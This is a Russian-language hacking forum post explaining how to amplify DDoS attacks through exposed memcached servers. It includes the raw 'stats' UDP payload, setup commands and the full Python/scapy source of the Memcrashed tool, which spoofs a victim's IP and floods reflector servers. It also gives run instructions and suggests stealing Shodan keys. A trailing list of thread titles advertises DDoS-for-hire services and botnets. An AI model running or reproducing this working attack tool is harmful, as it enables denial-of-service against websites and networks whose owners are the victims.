Усиливаем ddos атаки с помощью уязвимости в Memcached

Admin

Original poster
Administrator
Сообщения
916
Реакции
753
Посетить сайт
Суть в том, что все вы не взломаете, насколько крутыми вы бы не были, всегда найдется тот, кто круче вас. Для Хакера, DDOS - это последнее, чем он воспользуется. Мне не раз приходилось отбивать атаки и с каждым разом они становились все мощнее. Хакеры уже перестали взламывать, когда они могут устроить ddos атаку. Теперь даже не нужно создавать ботнет, в интернете много уязвимых серверов, которые усиливают атаки. И вот обнаружили новую уязвимость, которая позволяет усиливать атаки. Для того, чтобы совершить атаку достаточно знать ip адреса уязвимых серверов c открытым портом 11211. Таких адресов около 17 тыс. На порт уязвимого сервера отправляется пакет:
\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n
После обработки пакета сервер отвечает большим пакетом до 1mb. Это позволило совершить атаку в 1,3 ТБ/с. Github не справился с атакой, иностранный провайдер тоже, а ведь чтобы запустить такую атаку нужно всего-то пару минут.

Практика
Для начало нам нужно найти сервера, для этого мы воспользуемся

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

.
1.png
Или воспользуемся уже готовым списком, который собрали до нас -

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

. Скрипт для атаки написан на python 2.7.
sudo apt-get install python
Далее установим библиотеки:
Код:
python -m pip install datetime
python -m pip install scapy
Итак, запускаем программу:
Код:
python namescript.py -T xx.xx.xx.xx -S file.txt -P 100 -Thread 100
T - Цель
S - Файл с уязвимыми серверами
P - Кол-во отправленных пакетов
Thread - Потоки
2.png
Ссылка на программу -

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

[DOUBLEPOST]Automatically Merged Double Post[/DOUBLEPOST]Да для виндовc нужно поставить WinPcap:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Автор сделал скрипт с парсингом серверов через Shodan, по этому вам нужен будет ключик для него, который вы можете купить, сбрутить, спиздить.

Уже чувствую ваше возмущение "Ну ты шо так газуешь дядь? какие ключи, какой шодан?"
Специально для вас урезанная версия скрипта, без шодана, ip берутся из bots.txt':

Python:
#!/usr/bin/python
import sys, os, time
from pathlib import Path
from scapy.all import *
from contextlib import contextmanager

starttime=time.time()

@contextmanager
def suppress_stdout():
    with open(os.devnull, "w") as devnull:
        old_stdout = sys.stdout
        sys.stdout = devnull
        try:
            yield
        finally:
            sys.stdout = old_stdout

class color:
    HEADER = '\033[0m'

logo = color.HEADER + '''

   ███╗   ███╗███████╗███╗   ███╗ ██████╗██████╗  █████╗ ███████╗██╗  ██╗███████╗██████╗
   ████╗ ████║██╔════╝████╗ ████║██╔════╝██╔══██╗██╔══██╗██╔════╝██║  ██║██╔════╝██╔══██╗
   ██╔████╔██║█████╗  ██╔████╔██║██║     ██████╔╝███████║███████╗███████║█████╗  ██║  ██║
   ██║╚██╔╝██║██╔══╝  ██║╚██╔╝██║██║     ██╔══██╗██╔══██║╚════██║██╔══██║██╔══╝  ██║  ██║
   ██║ ╚═╝ ██║███████╗██║ ╚═╝ ██║╚██████╗██║  ██║██║  ██║███████║██║  ██║███████╗██████╔╝
   ╚═╝     ╚═╝╚══════╝╚═╝     ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝╚══════╝╚═════╝

                                        Author: @037
                                        Version: 3.1

####################################### DISCLAIMER ########################################
| Memcrashed is a tool that allows you to use Shodan.io to obtain hundreds of vulnerable  |
| memcached servers. It then allows you to use the same servers to launch widespread      |
| distributed denial of service attacks by forging UDP packets sourced to your victim.    |
| Default payload includes the memcached "stats" command, 10 bytes to send, but the reply |
| is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly.   |
| I am NOT responsible for any damages caused or any crimes committed by using this tool. |
###########################################################################################
                                                                                    
'''
print(logo)

target = input("[▸] Enter target IP address: ")
power = int(input("[▸] Enter preferred power (Default 1): ") or "1")
data = "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"

while True:
    try:
        ip_arrayn = []
        with open('bots.txt') as my_file:
            for line in my_file:
                ip_arrayn.append(line)
        ip_array = [s.rstrip() for s in ip_arrayn]
        counter= int(0)
        for i in ip_array:
            if power>1:
                print('[+] Sending %d forged UDP packets to: %s' % (power, i))
                with suppress_stdout():
                    send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)
            elif power==1:
                print('[+] Sending 1 forged UDP packet to: %s' % i)
                with suppress_stdout():
                    send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)
    except:
        print('')
        print('[•] Exiting Platform. Have a wonderful day.')
        break
Запускать так:
cd %путь_до_ файлов_Memcrashed.py_и_bots.txt%
python.exe Memcrashed.py
Вас спросят IP который вы хотите дудосить и кол-во серверов с которых будет идти дудос.
17к IP которые можешь засунуть в bot.txt:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Также можешь насканить себе еще серверов по порту 11211.​
 
Последнее редактирование:
  • Like
Реакции: User_Undefined
Название темы
Автор Заголовок Раздел Ответы Дата
Support81 Ботнет в каждом доме: хакеры снова порабощают роутеры TP-Link для DDoS-атак Новости в сети 0
V Ожидает оплаты Venom DDoS attack Спам / Флуд / Ддос 0
Emilio_Gaviriya Статья Как работает Анти-DDoS. Уязвимости и взлом 0
Kevin_attack Ожидает оплаты KEVIN DDOS SERVICE / ATTACKS FROM ANOTHER DIMENSION Спам / Флуд / Ддос 0
M Ожидает оплаты DDoS - attacks Ищу работу. Предлагаю свои услуги. 1
Support81 Победителей не будет: авторы Tor вступают в неравный бой с DDoS-атаками Новости в сети 0
Support81 CISA заявило о DDoS-атаках: хакеры хотят дестабилизировать ситуацию в мире Новости в сети 0
N ✅ (РЕКОМЕНДУЮ) №1 >>>DDos Атака<<|>>DDoS Service<<< ДДОС СЕРВИС<<|>>Заказать DDOS ✅ Ищу работу. Предлагаю свои услуги. 2
Shainy На проверке Shainy DDoS Service / Заказать DDOS услуги по приятной цене.Купить DDOS атаку.DDOS Услуги. / 24/7 / Гарант. Ищу работу. Предлагаю свои услуги. 1
S Scrooge_service! DDOS нового уровня! Корзина 2
D нужна услуга по атаку спам флуд DDos по адекватной ценеб плочу BTC Вопросы и интересы 1
V Закрыто Virtyal Attack Service DDoS!Заказать Атаку на Сайт!Качество/Гарантия/Анонимность! Корзина 1
F Закрыто Заказать DDOS услуги по адекватной цене. Купить DDOS атаку. DDOS Услуги. Ддос за крипту Корзина 1
C Layer 4 DDOS Tool Python Спам / Флуд / Ддос 0
X ИЩЕМ ЛУЧШИЙ В МИРЕ СЕРВИС ПО ПРЕДОСТАВЛЕНИЮ ЗАЩИТЫ В КЛИРНЕТ И ONION ОТ ЛЮБЫХ DDOS АТАК! Предоставляю работу. Ищу специалиста. 1
Ddoscrabs Продавец Premium ddos от Crabs Спам / Флуд / Ддос 19
G Интересно Самый бюджетный DDoS сервис Уязвимости и взлом 1
M Закрыто top-class DDoS service Корзина 1
G ✅Recommend✅ Innovative Technologies off Ddos Service. Ищу работу. Предлагаю свои услуги. 1
J [Service] DDoS Услуги Спам / Флуд / Ддос 3
W Проверено Service DDOS Attack DDOS Атака на заказ. Работаем 24/7 from WEB503 Спам / Флуд / Ддос 3
D ---->Daddy DDoS Service <----- | Устрани конкурента | Лучшие на рынке! Спам / Флуд / Ддос 1
E Проверено Online Service DDoS attack/Заказ Ddos услуг круглосуточно. Спам / Флуд / Ддос 2
A Интересно CasT-Security.ru Приватная защита от DDoS-атак Ищу работу. Предлагаю свои услуги. 0
Antonka_1000 У кого нибудь прога для DDOS'а серверов CS1.6???? Вопросы и интересы 4
turbion0 Проверено DDOS от ↯Turbion Service↯ Спам / Флуд / Ддос 1
S Куплю приватный ботнет для DDOS атак Куплю/Продам 0
D [Service]MASSIVE DDOS/ Мгновенное тестирование вашего ресурса. Ищу работу. Предлагаю свои услуги. 8
S Service DDOS Attack/ДДОС Атака на заказ. Профессионалы к вашим услугам. Спам / Флуд / Ддос 2
G Аренда DDOS мощностей с помесячной оплатой,хватит переплачивать псевдо ддосерам.(V 1.0) Спам / Флуд / Ддос 2
jsbypass >>> DDOS-SERVICE <<< | ЗАКАЗАТЬ ДДОС | ДДОС НА ЗАКАЗ Ищу работу. Предлагаю свои услуги. 2
0 Проверено DDoS Stresser|Best Layer7 Power| Устрани своего конкурента| Спам / Флуд / Ддос 28
D DDoS SerVice #1(Устраняем ваших конкурентов) Ищу работу. Предлагаю свои услуги. 0
J Предлагаю вам качественные услуги DDoS Attack Спам / Флуд / Ддос 1
NickelBlack DDOS SYN Flood Spam/DDOS/Malware 3
D Положим (сделаем недоступным) сайт! Ddos-сервис к вашим услугам! Проведём мощную ддос-атаку, устраним конкурентов легко и быстро! Спам / Флуд / Ддос 1
S Как защитить сайт от DDos Атак? Вопросы и интересы 2
Denik Интересно Анонимная DDoS атака на веб-сайт с помощью GoldenEye и способы защиты Уязвимости и взлом 1
N Предоставляю услуги по устранению сайтов и серверов с помощью DDOS атак.Наш сервис поможет решить ваши проблемы с конкурентами. Спам / Флуд / Ддос 0
S Продам SpideHost - Абузоустойчивые VPS/VDS + VIP FastFlux, MassScan, DDOS, AntiDDOS Сайты/Хостинг/Сервера 0
NickelBlack BlackNET Botnet v3.5 [Stealer+Keylogger+DDOS] .NET 24
L Интересно Участник «Сколково» защитит МТ5-брокеров от DDoS-атак Новости в сети 0
D Обучение DDos Вопросы и интересы 0
Denik Интересно DDOS сайта при использовании WordPress Уязвимости и взлом 1
L Интересно Домены биржи Binance подверглись DDoS-атаке Новости в сети 0
АнАлЬнАя ЧуПаКаБрА INLINE ddos сайта Проекты Private Keeper 5
T Набор в состав, для Ddos атак! Предоставляю работу. Ищу специалиста. 0
P Проверено =>MAGNIT-DDoS Attack Service!Оперативно,Круглосуточно,Качественно! Спам / Флуд / Ддос 6
X ⁣ ЗАКАЗАТЬ DDoS АТАКУ // МОЩНЫЙ СЕРВИС!!! Ищу работу. Предлагаю свои услуги. 1
A Защита от DDoS атак Anti-DDoS PRO Ищу работу. Предлагаю свои услуги. 0

Название темы